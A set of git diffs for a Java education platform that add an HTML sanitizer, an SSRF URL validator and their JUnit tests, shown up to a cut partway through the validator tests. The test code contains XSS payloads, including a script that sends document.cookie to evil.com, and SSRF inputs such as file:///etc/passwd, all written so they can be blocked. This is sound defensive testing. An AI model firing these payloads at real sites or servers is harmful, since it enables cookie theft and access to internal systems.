             return RICH_TEXT_FIELDS.contains(fieldName) ? sanitizeRichText(value) : sanitizeStrict(value);
+        }
+    }
+
+    private static List<Object> ensureMutableList(List<Object> list) {
+        try {
+            list.set(0, list.get(0)); // Test if mutable
+            return list;
+        } catch (UnsupportedOperationException e) {
+            return new ArrayList<>(list);
         }
     }
 
@@ -117,9 +128,16 @@ public class HtmlSanitizer {
         for (int i = 0; i < list.size(); i++) {
             Object item = list.get(i);
             if (item instanceof String) {
-                list.set(i, sanitizeField(parentKey, (String) item, depth + 1));
+                try {
+                    list.set(i, sanitizeField(parentKey, (String) item, depth + 1));
+                } catch (UnsupportedOperationException e) {
+                    // List is immutable, skip sanitization for this item
+                }
             } else if (item instanceof Map) {
                 sanitizeMap((Map<String, Object>) item, depth + 1);
+            } else if (item instanceof List) {
+                List<Object> mutableSubList = ensureMutableList((List<Object>) item);
+                sanitizeList(parentKey, mutableSubList, depth + 1);
             }
         }
     }

--- a/platform-core/platform-common/src/main/java/org/sunbird/common/HtmlSanitizer.java
+++ b/platform-core/platform-common/src/main/java/org/sunbird/common/HtmlSanitizer.java
@@ -3,7 +3,7 @@ package org.sunbird.common;
 import org.apache.commons.lang3.StringUtils;
 import org.owasp.html.HtmlPolicyBuilder;
 import org.owasp.html.PolicyFactory;
-
+import org.sunbird.common.Platform;
 import java.util.Arrays;
 import java.util.HashSet;
 import java.util.List;
@@ -13,6 +13,8 @@ import java.util.stream.Collectors;
 
 public class HtmlSanitizer {
 
+    private static final int MAX_DEPTH = Platform.getInteger("html.sanitizer.max.depth", 25);
+    
     private static final PolicyFactory STRICT_POLICY = new HtmlPolicyBuilder().toFactory();
 
     private static final PolicyFactory RICH_TEXT_POLICY = new HtmlPolicyBuilder()
@@ -58,36 +60,66 @@ public class HtmlSanitizer {
     }
 
     public static String sanitizeField(String fieldName, String value) {
-        if (StringUtils.isBlank(value) || IGNORE_FIELDS.contains(fieldName)) return value;
+        return sanitizeField(fieldName, value, 0);
+    }
+
+    private static String sanitizeField(String fieldName, String value, int depth) {
+        if (StringUtils.isBlank(value) || IGNORE_FIELDS.contains(fieldName) || depth > MAX_DEPTH) return value;
+        if (isJson(value)) {
+            return sanitizeJsonString(fieldName, value, depth + 1);
+        }
         if (RICH_TEXT_FIELDS.contains(fieldName)) {
             return sanitizeRichText(value);
         }
         return sanitizeStrict(value);
     }
 
+    private static boolean isJson(String value) {
+        String trimmed = value.trim();
+        return (trimmed.startsWith("{") && trimmed.endsWith("}")) || (trimmed.startsWith("[") && trimmed.endsWith("]"));
+    }
+
+    private static String sanitizeJsonString(String fieldName, String value, int depth) {
+        try {
+            Object json = JsonUtils.deserialize(value, Object.class);
+            if (json instanceof Map) {
+                sanitizeMap((Map<String, Object>) json, depth + 1);
+            } else if (json instanceof List) {
+                sanitizeList(fieldName, (List<Object>) json, depth + 1);
+            }
+            return JsonUtils.serialize(json);
+        } catch (Exception e) {
+            return RICH_TEXT_FIELDS.contains(fieldName) ? sanitizeRichText(value) : sanitizeStrict(value);
+        }
+    }
+
     public static void sanitizeMap(Map<String, Object> data) {
-        if (data == null || data.isEmpty()) return;
+        sanitizeMap(data, 0);
+    }
+
+    private static void sanitizeMap(Map<String, Object> data, int depth) {
+        if (data == null || data.isEmpty() || depth > MAX_DEPTH) return;
         List<String> keys = data.keySet().stream().collect(Collectors.toList());
         for (String key : keys) {
             Object value = data.get(key);
             if (value instanceof String) {
-                data.put(key, sanitizeField(key, (String) value));
+                data.put(key, sanitizeField(key, (String) value, depth + 1));
             } else if (value instanceof Map) {
-                sanitizeMap((Map<String, Object>) value);
+                sanitizeMap((Map<String, Object>) value, depth + 1);
             } else if (value instanceof List) {
-                sanitizeList(key, (List<Object>) value);
+                sanitizeList(key, (List<Object>) value, depth + 1);
             }
         }
     }
 
-    private static void sanitizeList(String parentKey, List<Object> list) {
-        if (list == null || list.isEmpty()) return;
+    private static void sanitizeList(String parentKey, List<Object> list, int depth) {
+        if (list == null || list.isEmpty() || depth > MAX_DEPTH) return;
         for (int i = 0; i < list.size(); i++) {
             Object item = list.get(i);
             if (item instanceof String) {
-                list.set(i, sanitizeField(parentKey, (String) item));
+                list.set(i, sanitizeField(parentKey, (String) item, depth + 1));
             } else if (item instanceof Map) {
-                sanitizeMap((Map<String, Object>) item);
+                sanitizeMap((Map<String, Object>) item, depth + 1);
             }
         }
     }

--- a/platform-core/platform-common/src/main/java/org/sunbird/common/HtmlSanitizer.java
+++ b/platform-core/platform-common/src/main/java/org/sunbird/common/HtmlSanitizer.java
@@ -1,0 +1,88 @@
+package org.sunbird.common;
+
+import org.apache.commons.lang3.StringUtils;
+import org.owasp.html.HtmlPolicyBuilder;
+import org.owasp.html.PolicyFactory;
+
+import java.util.Arrays;
+import java.util.HashSet;
+import java.util.List;
+import java.util.Map;
+import java.util.Set;
+import java.util.stream.Collectors;
+
+public class HtmlSanitizer {
+
+    private static final PolicyFactory STRICT_POLICY = new HtmlPolicyBuilder().toFactory();
+
+    private static final PolicyFactory RICH_TEXT_POLICY = new HtmlPolicyBuilder()
+            .allowElements("p", "br", "b", "i", "u", "strong", "em", "ul", "ol", "li",
+                    "h1", "h2", "h3", "h4", "h5", "h6", "span", "div", "table", "thead",
+                    "tbody", "tr", "td", "th", "blockquote", "pre", "code", "sub", "sup",
+                    "figure", "figcaption", "math", "mrow", "mi", "mo", "mn", "msup",
+                    "msub", "mfrac", "msqrt", "mover", "munder")
+            .allowAttributes("class", "style", "dir", "lang").globally()
+            .allowAttributes("colspan", "rowspan").onElements("td", "th")
+            .allowAttributes("mathvariant").onElements("mi")
+            .allowStyling()
+            .toFactory();
+
+    private static final Set<String> RICH_TEXT_FIELDS = new HashSet<>(Arrays.asList(
+            "body", "solutions", "instructions", "hints", "answer", "editorState",
+            "question", "responseDeclaration", "outcomeDeclaration"
+    ));
+
+    public static String sanitizeStrict(String input) {
+        if (StringUtils.isBlank(input)) return input;
+        return STRICT_POLICY.sanitize(input);
+    }
+
+    public static String sanitizeRichText(String input) {
+        if (StringUtils.isBlank(input)) return input;
+        return RICH_TEXT_POLICY.sanitize(input);
+    }
+
+    public static String escapeHtml(String input) {
+        if (StringUtils.isBlank(input)) return input;
+        return input.replace("&", "&amp;")
+                .replace("<", "&lt;")
+                .replace(">", "&gt;")
+                .replace("\"", "&quot;")
+                .replace("'", "&#39;");
+    }
+
+    public static String sanitizeField(String fieldName, String value) {
+        if (StringUtils.isBlank(value)) return value;
+        if (RICH_TEXT_FIELDS.contains(fieldName)) {
+            return sanitizeRichText(value);
+        }
+        return sanitizeStrict(value);
+    }
+
+    public static void sanitizeMap(Map<String, Object> data) {
+        if (data == null || data.isEmpty()) return;
+        List<String> keys = data.keySet().stream().collect(Collectors.toList());
+        for (String key : keys) {
+            Object value = data.get(key);
+            if (value instanceof String) {
+                data.put(key, sanitizeField(key, (String) value));
+            } else if (value instanceof Map) {
+                sanitizeMap((Map<String, Object>) value);
+            } else if (value instanceof List) {
+                sanitizeList(key, (List<Object>) value);
+            }
+        }
+    }
+
+    private static void sanitizeList(String parentKey, List<Object> list) {
+        if (list == null || list.isEmpty()) return;
+        for (int i = 0; i < list.size(); i++) {
+            Object item = list.get(i);
+            if (item instanceof String) {
+                list.set(i, sanitizeField(parentKey, (String) item));
+            } else if (item instanceof Map) {
+                sanitizeMap((Map<String, Object>) item);
+            }
+        }
+    }
+}

--- a/platform-core/platform-common/src/main/java/org/sunbird/common/HtmlSanitizer.java
+++ b/platform-core/platform-common/src/main/java/org/sunbird/common/HtmlSanitizer.java
@@ -10,6 +10,7 @@ import java.util.HashSet;
 import java.util.List;
 import java.util.Map;
 import java.util.Set;
+import java.util.regex.Pattern;
 import java.util.stream.Collectors;
 
 public class HtmlSanitizer {
@@ -38,8 +39,12 @@ public class HtmlSanitizer {
     private static final Set<String> IGNORE_FIELDS = new HashSet<>(Arrays.asList(
             "createdOn", "lastUpdatedOn", "lastStatusChangedOn", "lastPublishedOn",
             "lastSubmittedOn", "versionDate", "artifactUrl", "downloadUrl", "previewUrl",
-            "streamingUrl", "appIcon", "posterImage", "toc_url"
+            "streamingUrl", "appIcon", "posterImage", "toc_url",
+            "sYS_INTERNAL_LAST_UPDATED_ON", "prevStatus"
     ));
+
+    private static final Pattern TIMESTAMP_PATTERN = Pattern.compile(
+            "^\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}(\\.\\d+)?(Z|[+-]\\d{4})$");
 
     public static String sanitizeStrict(String input) {
         if (StringUtils.isBlank(input)) return input;
@@ -66,6 +71,7 @@ public class HtmlSanitizer {
 
     private static String sanitizeField(String fieldName, String value, int depth) {
         if (StringUtils.isBlank(value) || IGNORE_FIELDS.contains(fieldName) || depth > MAX_DEPTH) return value;
+        if (TIMESTAMP_PATTERN.matcher(value.trim()).matches()) return value;
         if (isJson(value)) {
             return sanitizeJsonString(fieldName, value, depth + 1);
         }

--- a/platform-core/platform-common/src/main/java/org/sunbird/common/HtmlSanitizer.java
+++ b/platform-core/platform-common/src/main/java/org/sunbird/common/HtmlSanitizer.java
@@ -96,6 +96,7 @@ public class HtmlSanitizer {
     }
 
     private static List<Object> ensureMutableList(List<Object> list) {
+        if (list.isEmpty()) return list;
         try {
             list.set(0, list.get(0)); // Test if mutable
             return list;
@@ -118,7 +119,9 @@ public class HtmlSanitizer {
             } else if (value instanceof Map) {
                 sanitizeMap((Map<String, Object>) value, depth + 1);
             } else if (value instanceof List) {
-                sanitizeList(key, (List<Object>) value, depth + 1);
+                List<Object> mutableList = ensureMutableList((List<Object>) value);
+                data.put(key, mutableList);
+                sanitizeList(key, mutableList, depth + 1);
             }
         }
     }
@@ -128,15 +131,12 @@ public class HtmlSanitizer {
         for (int i = 0; i < list.size(); i++) {
             Object item = list.get(i);
             if (item instanceof String) {
-                try {
-                    list.set(i, sanitizeField(parentKey, (String) item, depth + 1));
-                } catch (UnsupportedOperationException e) {
-                    // List is immutable, skip sanitization for this item
-                }
+                list.set(i, sanitizeField(parentKey, (String) item, depth + 1));
             } else if (item instanceof Map) {
                 sanitizeMap((Map<String, Object>) item, depth + 1);
             } else if (item instanceof List) {
                 List<Object> mutableSubList = ensureMutableList((List<Object>) item);
+                list.set(i, mutableSubList);
                 sanitizeList(parentKey, mutableSubList, depth + 1);
             }
         }

--- a/platform-core/platform-common/src/main/java/org/sunbird/common/SafeUrlValidator.java
+++ b/platform-core/platform-common/src/main/java/org/sunbird/common/SafeUrlValidator.java
@@ -1,0 +1,117 @@
+package org.sunbird.common;
+
+import org.apache.commons.lang3.StringUtils;
+import org.sunbird.common.exception.ClientException;
+
+import java.net.InetAddress;
+import java.net.MalformedURLException;
+import java.net.URL;
+import java.net.UnknownHostException;
+import java.util.Arrays;
+import java.util.Collections;
+import java.util.HashSet;
+import java.util.List;
+import java.util.Set;
+
+public class SafeUrlValidator {
+
+    private static final Set<String> ALLOWED_PROTOCOLS = Collections.unmodifiableSet(
+            new HashSet<>(Arrays.asList("http", "https")));
+
+    private static final Set<String> BLOCKED_HOSTNAMES = Collections.unmodifiableSet(
+            new HashSet<>(Arrays.asList(
+                    "localhost",
+                    "metadata.google.internal",
+                    "metadata.google",
+                    "kubernetes.default.svc"
+            )));
+
+    private static final Set<String> ALLOWED_PROTOCOLS_CONFIG;
+
+    static {
+        Set<String> configured = null;
+        try {
+            if (Platform.config.hasPath("ssrf.allowed.protocols")) {
+                configured = new HashSet<>(Platform.config.getStringList("ssrf.allowed.protocols"));
+            }
+        } catch (Exception e) {
+            // Config not available
+        }
+        ALLOWED_PROTOCOLS_CONFIG = configured != null ? Collections.unmodifiableSet(configured) : ALLOWED_PROTOCOLS;
+    }
+
+    public static void validate(String urlString) {
+        if (StringUtils.isBlank(urlString)) {
+            throw new ClientException("ERR_INVALID_URL", "URL must not be blank");
+        }
+
+        URL url;
+        try {
+            url = new URL(urlString);
+        } catch (MalformedURLException e) {
+            throw new ClientException("ERR_INVALID_URL", "Malformed URL: " + urlString);
+        }
+
+        validateProtocol(url);
+        validateHost(url);
+        validateIpAddress(url);
+    }
+
+    private static void validateProtocol(URL url) {
+        String protocol = url.getProtocol().toLowerCase();
+        if (!ALLOWED_PROTOCOLS_CONFIG.contains(protocol)) {
+            throw new ClientException("ERR_BLOCKED_URL_PROTOCOL",
+                    "URL protocol not allowed: " + protocol + ". Only " + ALLOWED_PROTOCOLS_CONFIG + " allowed.");
+        }
+    }
+
+    private static void validateHost(URL url) {
+        String host = url.getHost().toLowerCase();
+        if (BLOCKED_HOSTNAMES.contains(host)) {
+            throw new ClientException("ERR_BLOCKED_URL_HOST",
+                    "URL host not allowed: " + host);
+        }
+    }
+
+    private static void validateIpAddress(URL url) {
+        String host = url.getHost();
+        try {
+            InetAddress address = InetAddress.getByName(host);
+            byte[] addr = address.getAddress();
+
+            if (address.isLoopbackAddress()) {
+                throw new ClientException("ERR_BLOCKED_URL_IP",
+                        "URL resolves to loopback address");
+            }
+
+            if (address.isSiteLocalAddress()) {
+                throw new ClientException("ERR_BLOCKED_URL_IP",
+                        "URL resolves to private network address");
+            }
+
+            if (address.isLinkLocalAddress()) {
+                throw new ClientException("ERR_BLOCKED_URL_IP",
+                        "URL resolves to link-local address");
+            }
+
+            if (address.isAnyLocalAddress()) {
+                throw new ClientException("ERR_BLOCKED_URL_IP",
+                        "URL resolves to wildcard address");
+            }
+
+            // Block cloud metadata IP explicitly (169.254.169.254)
+            if (addr.length == 4
+                    && (addr[0] & 0xFF) == 169
+                    && (addr[1] & 0xFF) == 254
+                    && (addr[2] & 0xFF) == 169
+                    && (addr[3] & 0xFF) == 254) {
+                throw new ClientException("ERR_BLOCKED_URL_IP",
+                        "URL resolves to cloud metadata endpoint");
+            }
+
+        } catch (UnknownHostException e) {
+            throw new ClientException("ERR_INVALID_URL",
+                    "Cannot resolve host: " + host);
+        }
+    }
+}

--- a/platform-core/platform-common/src/main/java/org/sunbird/common/SafeUrlValidator.java
+++ b/platform-core/platform-common/src/main/java/org/sunbird/common/SafeUrlValidator.java
@@ -76,42 +76,70 @@ public class SafeUrlValidator {
     private static void validateIpAddress(URL url) {
         String host = url.getHost();
         try {
-            InetAddress address = InetAddress.getByName(host);
-            byte[] addr = address.getAddress();
+            InetAddress[] addresses = InetAddress.getAllByName(host);
+            for (InetAddress address : addresses) {
+                byte[] addr = address.getAddress();
 
-            if (address.isLoopbackAddress()) {
-                throw new ClientException("ERR_BLOCKED_URL_IP",
-                        "URL resolves to loopback address");
+                if (address.isLoopbackAddress()) {
+                    throw new ClientException("ERR_BLOCKED_URL_IP",
+                            "URL resolves to loopback address");
+                }
+
+                if (address.isSiteLocalAddress()) {
+                    throw new ClientException("ERR_BLOCKED_URL_IP",
+                            "URL resolves to private network address");
+                }
+
+                if (address.isLinkLocalAddress()) {
+                    throw new ClientException("ERR_BLOCKED_URL_IP",
+                            "URL resolves to link-local address");
+                }
+
+                if (address.isAnyLocalAddress()) {
+                    throw new ClientException("ERR_BLOCKED_URL_IP",
+                            "URL resolves to wildcard address");
+                }
+
+                // Block IPv6 ULA (fc00::/7)
+                if (addr.length == 16 && (addr[0] & 0xFE) == 0xFC) {
+                    throw new ClientException("ERR_BLOCKED_URL_IP",
+                            "URL resolves to IPv6 unique local address");
+                }
+
+                // Block IPv4-mapped IPv6 (::ffff:x.x.x.x) pointing to private ranges
+                if (addr.length == 16 && isIPv4MappedPrivate(addr)) {
+                    throw new ClientException("ERR_BLOCKED_URL_IP",
+                            "URL resolves to private network address");
+                }
+
+                // Block cloud metadata IP explicitly (169.254.169.254)
+                if (addr.length == 4
+                        && (addr[0] & 0xFF) == 169
+                        && (addr[1] & 0xFF) == 254
+                        && (addr[2] & 0xFF) == 169
+                        && (addr[3] & 0xFF) == 254) {
+                    throw new ClientException("ERR_BLOCKED_URL_IP",
+                            "URL resolves to cloud metadata endpoint");
+                }
             }
-
-            if (address.isSiteLocalAddress()) {
-                throw new ClientException("ERR_BLOCKED_URL_IP",
-                        "URL resolves to private network address");
-            }
-
-            if (address.isLinkLocalAddress()) {
-                throw new ClientException("ERR_BLOCKED_URL_IP",
-                        "URL resolves to link-local address");
-            }
-
-            if (address.isAnyLocalAddress()) {
-                throw new ClientException("ERR_BLOCKED_URL_IP",
-                        "URL resolves to wildcard address");
-            }
-
-            // Block cloud metadata IP explicitly (169.254.169.254)
-            if (addr.length == 4
-                    && (addr[0] & 0xFF) == 169
-                    && (addr[1] & 0xFF) == 254
-                    && (addr[2] & 0xFF) == 169
-                    && (addr[3] & 0xFF) == 254) {
-                throw new ClientException("ERR_BLOCKED_URL_IP",
-                        "URL resolves to cloud metadata endpoint");
-            }
-
         } catch (UnknownHostException e) {
             throw new ClientException("ERR_INVALID_URL",
                     "Cannot resolve host: " + host);
         }
+    }
+
+    private static boolean isIPv4MappedPrivate(byte[] addr) {
+        // Check ::ffff: prefix (bytes 0-9 = 0, bytes 10-11 = 0xFF)
+        for (int i = 0; i < 10; i++) {
+            if (addr[i] != 0) return false;
+        }
+        if ((addr[10] & 0xFF) != 0xFF || (addr[11] & 0xFF) != 0xFF) return false;
+        int b0 = addr[12] & 0xFF;
+        int b1 = addr[13] & 0xFF;
+        // 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 127.0.0.0/8, 169.254.0.0/16
+        return b0 == 10 || b0 == 127
+                || (b0 == 172 && (b1 & 0xF0) == 16)
+                || (b0 == 192 && b1 == 168)
+                || (b0 == 169 && b1 == 254);
     }
 }

--- a/platform-core/platform-common/src/test/java/org/sunbird/common/HtmlSanitizerTest.java
+++ b/platform-core/platform-common/src/test/java/org/sunbird/common/HtmlSanitizerTest.java
@@ -1,0 +1,299 @@
+package org.sunbird.common;
+
+import org.junit.Assert;
+import org.junit.Test;
+
+import java.util.ArrayList;
+import java.util.Arrays;
+import java.util.HashMap;
+import java.util.List;
+import java.util.Map;
+
+public class HtmlSanitizerTest {
+
+    // === escapeHtml tests ===
+
+    @Test
+    public void testEscapeHtmlWithScriptTag() {
+        String input = "<script>alert('xss')</script>";
+        String result = HtmlSanitizer.escapeHtml(input);
+        Assert.assertFalse(result.contains("<script>"));
+        Assert.assertTrue(result.contains("&lt;script&gt;"));
+    }
+
+    @Test
+    public void testEscapeHtmlWithImgOnerror() {
+        String input = "<img src=x onerror=\"steal(document.cookie)\">";
+        String result = HtmlSanitizer.escapeHtml(input);
+        Assert.assertFalse("Should not contain raw HTML tag", result.contains("<img"));
+        Assert.assertTrue("Should contain escaped tag", result.contains("&lt;img"));
+        Assert.assertTrue("Should contain escaped quotes", result.contains("&quot;"));
+    }
+
+    @Test
+    public void testEscapeHtmlPreservesPlainText() {
+        String input = "Paris is the capital of France";
+        Assert.assertEquals(input, HtmlSanitizer.escapeHtml(input));
+    }
+
+    @Test
+    public void testEscapeHtmlWithNull() {
+        Assert.assertNull(HtmlSanitizer.escapeHtml(null));
+    }
+
+    @Test
+    public void testEscapeHtmlWithEmpty() {
+        Assert.assertEquals("", HtmlSanitizer.escapeHtml(""));
+    }
+
+    @Test
+    public void testEscapeHtmlWithAmpersand() {
+        String input = "Tom & Jerry";
+        Assert.assertEquals("Tom &amp; Jerry", HtmlSanitizer.escapeHtml(input));
+    }
+
+    @Test
+    public void testEscapeHtmlWithAllSpecialChars() {
+        String input = "<div class=\"test\">'hello'</div>";
+        String result = HtmlSanitizer.escapeHtml(input);
+        Assert.assertTrue(result.contains("&lt;"));
+        Assert.assertTrue(result.contains("&gt;"));
+        Assert.assertTrue(result.contains("&quot;"));
+        Assert.assertTrue(result.contains("&#39;"));
+    }
+
+    // === sanitizeStrict tests ===
+
+    @Test
+    public void testSanitizeStrictStripsAllHtml() {
+        String input = "<script>alert(1)</script>Hello";
+        String result = HtmlSanitizer.sanitizeStrict(input);
+        Assert.assertFalse(result.contains("<script>"));
+        Assert.assertTrue(result.contains("Hello"));
+    }
+
+    @Test
+    public void testSanitizeStrictStripsImgTag() {
+        String input = "Test<img src=x onerror=alert(1)>Name";
+        String result = HtmlSanitizer.sanitizeStrict(input);
+        Assert.assertFalse(result.contains("<img"));
+        Assert.assertFalse(result.contains("onerror"));
+        Assert.assertTrue(result.contains("Test"));
+        Assert.assertTrue(result.contains("Name"));
+    }
+
+    @Test
+    public void testSanitizeStrictPreservesPlainText() {
+        String input = "Normal content name";
+        Assert.assertEquals(input, HtmlSanitizer.sanitizeStrict(input));
+    }
+
+    @Test
+    public void testSanitizeStrictWithNull() {
+        Assert.assertNull(HtmlSanitizer.sanitizeStrict(null));
+    }
+
+    @Test
+    public void testSanitizeStrictStripsIframe() {
+        String input = "<iframe src=\"http://evil.com\"></iframe>Safe";
+        String result = HtmlSanitizer.sanitizeStrict(input);
+        Assert.assertFalse(result.contains("<iframe"));
+        Assert.assertTrue(result.contains("Safe"));
+    }
+
+    @Test
+    public void testSanitizeStrictStripsEventHandlers() {
+        String input = "<div onmouseover=\"steal()\">Hover me</div>";
+        String result = HtmlSanitizer.sanitizeStrict(input);
+        Assert.assertFalse(result.contains("onmouseover"));
+        Assert.assertFalse(result.contains("steal"));
+    }
+
+    // === sanitizeRichText tests ===
+
+    @Test
+    public void testSanitizeRichTextAllowsSafeTags() {
+        String input = "<p>Hello <b>world</b></p>";
+        String result = HtmlSanitizer.sanitizeRichText(input);
+        Assert.assertTrue(result.contains("<p>"));
+        Assert.assertTrue(result.contains("<b>"));
+    }
+
+    @Test
+    public void testSanitizeRichTextStripsScript() {
+        String input = "<p>Safe</p><script>alert(1)</script>";
+        String result = HtmlSanitizer.sanitizeRichText(input);
+        Assert.assertTrue(result.contains("<p>"));
+        Assert.assertFalse(result.contains("<script>"));
+    }
+
+    @Test
+    public void testSanitizeRichTextStripsOnerror() {
+        String input = "<p>Text</p><img src=x onerror=\"steal()\">";
+        String result = HtmlSanitizer.sanitizeRichText(input);
+        Assert.assertTrue(result.contains("<p>"));
+        Assert.assertFalse(result.contains("onerror"));
+    }
+
+    @Test
+    public void testSanitizeRichTextAllowsMathTags() {
+        String input = "<math><mrow><mi>x</mi><mo>+</mo><mn>1</mn></mrow></math>";
+        String result = HtmlSanitizer.sanitizeRichText(input);
+        Assert.assertTrue(result.contains("<math>"));
+        Assert.assertTrue(result.contains("<mi>"));
+    }
+
+    @Test
+    public void testSanitizeRichTextAllowsTableTags() {
+        String input = "<table><tr><td colspan=\"2\">Cell</td></tr></table>";
+        String result = HtmlSanitizer.sanitizeRichText(input);
+        Assert.assertTrue(result.contains("<table>"));
+        Assert.assertTrue(result.contains("<td"));
+    }
+
+    // === sanitizeField tests (routing logic) ===
+
+    @Test
+    public void testSanitizeFieldBodyUsesRichText() {
+        String input = "<p>Safe</p><script>evil</script>";
+        String result = HtmlSanitizer.sanitizeField("body", input);
+        Assert.assertTrue(result.contains("<p>"));
+        Assert.assertFalse(result.contains("<script>"));
+    }
+
+    @Test
+    public void testSanitizeFieldNameUsesStrict() {
+        String input = "<script>alert(1)</script>My Content";
+        String result = HtmlSanitizer.sanitizeField("name", input);
+        Assert.assertFalse(result.contains("<script>"));
+        Assert.assertTrue(result.contains("My Content"));
+    }
+
+    @Test
+    public void testSanitizeFieldDescriptionUsesStrict() {
+        String input = "Desc<img src=x onerror=alert(1)>";
+        String result = HtmlSanitizer.sanitizeField("description", input);
+        Assert.assertFalse(result.contains("<img"));
+        Assert.assertTrue(result.contains("Desc"));
+    }
+
+    // === sanitizeMap tests (recursive) ===
+
+    @Test
+    public void testSanitizeMapStripsXssFromName() {
+        Map<String, Object> data = new HashMap<>();
+        data.put("name", "<script>alert('xss')</script>Test Content");
+        data.put("code", "test-code");
+        HtmlSanitizer.sanitizeMap(data);
+        Assert.assertFalse(((String) data.get("name")).contains("<script>"));
+        Assert.assertTrue(((String) data.get("name")).contains("Test Content"));
+        Assert.assertEquals("test-code", data.get("code"));
+    }
+
+    @Test
+    public void testSanitizeMapStripsXssFromDescription() {
+        Map<String, Object> data = new HashMap<>();
+        data.put("description", "<img src=x onerror=\"document.cookie\">");
+        HtmlSanitizer.sanitizeMap(data);
+        Assert.assertFalse(((String) data.get("description")).contains("<img"));
+    }
+
+    @Test
+    public void testSanitizeMapHandlesNestedMaps() {
+        Map<String, Object> inner = new HashMap<>();
+        inner.put("label", "<script>steal()</script>Option A");
+        Map<String, Object> data = new HashMap<>();
+        data.put("interactions", inner);
+        HtmlSanitizer.sanitizeMap(data);
+        Map<String, Object> sanitizedInner = (Map<String, Object>) data.get("interactions");
+        Assert.assertFalse(((String) sanitizedInner.get("label")).contains("<script>"));
+    }
+
+    @Test
+    public void testSanitizeMapHandlesLists() {
+        List<Object> options = new ArrayList<>();
+        options.add("<script>xss</script>Option1");
+        options.add("Option2");
+        Map<String, Object> data = new HashMap<>();
+        data.put("options", options);
+        HtmlSanitizer.sanitizeMap(data);
+        List<Object> sanitized = (List<Object>) data.get("options");
+        Assert.assertFalse(((String) sanitized.get(0)).contains("<script>"));
+        Assert.assertEquals("Option2", sanitized.get(1));
+    }
+
+    @Test
+    public void testSanitizeMapHandlesNullMap() {
+        HtmlSanitizer.sanitizeMap(null); // should not throw
+    }
+
+    @Test
+    public void testSanitizeMapHandlesEmptyMap() {
+        Map<String, Object> data = new HashMap<>();
+        HtmlSanitizer.sanitizeMap(data); // should not throw
+        Assert.assertTrue(data.isEmpty());
+    }
+
+    @Test
+    public void testSanitizeMapPreservesNonStringValues() {
+        Map<String, Object> data = new HashMap<>();
+        data.put("name", "Safe Name");
+        data.put("maxScore", 100);
+        data.put("isPublished", true);
+        HtmlSanitizer.sanitizeMap(data);
+        Assert.assertEquals("Safe Name", data.get("name"));
+        Assert.assertEquals(100, data.get("maxScore"));
+        Assert.assertEquals(true, data.get("isPublished"));
+    }
+
+    // === XSS attack vector tests (from security report) ===
+
+    @Test
+    public void testXssVuln01_QuestionBodyPayload() {
+        String payload = "<img src=x onerror=\"var d=document.createElement('div');d.id='xss-proof';" +
+                "d.innerText='COOKIES:'+document.cookie;document.body.appendChild(d)\">";
+        String result = HtmlSanitizer.sanitizeField("body", payload);
+        Assert.assertFalse(result.contains("onerror"));
+        Assert.assertFalse(result.contains("document.cookie"));
+    }
+
+    @Test
+    public void testXssVuln02_OptionLabelPayload() {
+        String payload = "<img src=x onerror=\"document.title='XSS-VULN-02: '+document.cookie\">";
+        String escaped = HtmlSanitizer.escapeHtml(payload);
+        Assert.assertFalse(escaped.contains("<img"));
+        Assert.assertTrue(escaped.contains("&lt;img"));
+    }
+
+    @Test
+    public void testXssVuln03_ContentNamePayload() {
+        String payload = "<script>fetch('http://evil.com?c='+document.cookie)</script>Legit Name";
+        String result = HtmlSanitizer.sanitizeField("name", payload);
+        Assert.assertFalse(result.contains("<script>"));
+        Assert.assertFalse(result.contains("fetch("));
+        Assert.assertTrue(result.contains("Legit Name"));
+    }
+
+    @Test
+    public void testXssVuln06_FrameworkTranslationsPayload() {
+        String payload = "<img src=x onerror=\"console.log('XSS-TRANSLATIONS')\">";
+        String result = HtmlSanitizer.sanitizeField("translations", payload);
+        Assert.assertFalse(result.contains("<img"));
+        Assert.assertFalse(result.contains("onerror"));
+    }
+
+    @Test
+    public void testSanitizeMapWithFrameworkXssPayload() {
+        Map<String, Object> data = new HashMap<>();
+        data.put("name", "<script>alert('xss-framework')</script>");
+        data.put("description", "<img src=x onerror=alert(document.cookie)>");
+        Map<String, Object> translations = new HashMap<>();
+        translations.put("hi", "<img src=x onerror=\"console.log('XSS')\">");
+        data.put("translations", translations);
+        HtmlSanitizer.sanitizeMap(data);
+        Assert.assertFalse(((String) data.get("name")).contains("<script>"));
+        Assert.assertFalse(((String) data.get("description")).contains("<img"));
+        Map<String, Object> sanitizedTranslations = (Map<String, Object>) data.get("translations");
+        Assert.assertFalse(((String) sanitizedTranslations.get("hi")).contains("onerror"));
+    }
+}

--- a/platform-core/platform-common/src/test/java/org/sunbird/common/SafeUrlValidatorTest.java
+++ b/platform-core/platform-common/src/test/java/org/sunbird/common/SafeUrlValidatorTest.java
@@ -1,0 +1,205 @@
+package org.sunbird.common;
+
+import org.junit.Assert;
+import org.junit.Test;
+import org.sunbird.common.exception.ClientException;
+
+public class SafeUrlValidatorTest {
+
+    // === Protocol validation (SSRF-VULN-03: file:// read) ===
+
+    @Test
+    public void testValidHttpUrl() {
+        SafeUrlValidator.validate("http://example.com/file.pdf");
+    }
+
+    @Test
+    public void testValidHttpsUrl() {
+        SafeUrlValidator.validate("https://example.com/file.pdf");
+    }
+
+    @Test(expected = ClientException.class)
+    public void testBlockFileProtocol() {
+        SafeUrlValidator.validate("file:///etc/passwd");
+    }
+
+    @Test(expected = ClientException.class)
+    public void testBlockFtpProtocol() {
+        SafeUrlValidator.validate("ftp://internal-server/data");
+    }
+
+    @Test(expected = ClientException.class)
+    public void testBlockJarProtocol() {
+        SafeUrlValidator.validate("jar:file:///tmp/evil.jar!/payload");
+    }
+
+    @Test(expected = ClientException.class)
+    public void testBlockGopherProtocol() {
+        SafeUrlValidator.validate("gopher://evil.com:70/");
+    }
+
+    // === Blocked hostnames ===
+
+    @Test(expected = ClientException.class)
+    public void testBlockLocalhost() {
+        SafeUrlValidator.validate("http://localhost:9200/");
+    }
+
+    @Test(expected = ClientException.class)
+    public void testBlockMetadataGoogle() {
+        SafeUrlValidator.validate("http://metadata.google.internal/computeMetadata/v1/");
+    }
+
+    // === Loopback addresses (SSRF-VULN-03: port scan) ===
+
+    @Test(expected = ClientException.class)
+    public void testBlockLoopback127() {
+        SafeUrlValidator.validate("http://127.0.0.1:9000/health");
+    }
+
+    @Test(expected = ClientException.class)
+    public void testBlockLoopback127Alt() {
+        SafeUrlValidator.validate("http://127.0.0.2/");
+    }
+
+    // === Private network ranges ===
+
+    @Test(expected = ClientException.class)
